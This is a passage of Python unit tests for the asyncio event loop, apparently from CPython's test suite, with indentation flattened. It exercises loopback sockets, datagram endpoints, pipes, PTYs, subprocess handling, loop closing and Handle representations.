client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def _test_create_datagram_endpoint(self, local_addr, family):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=local_addr, family=family)
s_transport, server = self.loop.run_until_complete(coro)
sockname = s_transport.get_extra_info('sockname')
host, port = socket.getnameinfo(
sockname, socket.NI_NUMERICHOST|socket.NI_NUMERICSERV)
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint(self):
self._test_create_datagram_endpoint(('127.0.0.1', 0), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_ipv6(self):
self._test_create_datagram_endpoint(('::1', 0), socket.AF_INET6)
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = self.loop.create_task(main())
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
        # The ideal number of calls is 12, but on some platforms the selector
        # may sleep a little less than the timeout, depending on the resolution
        # of the clock used by the kernel. Tolerate a few useless calls on
        # these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = self.loop.create_future()
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
with self.assertWarns(DeprecationWarning):
    _, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_code or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
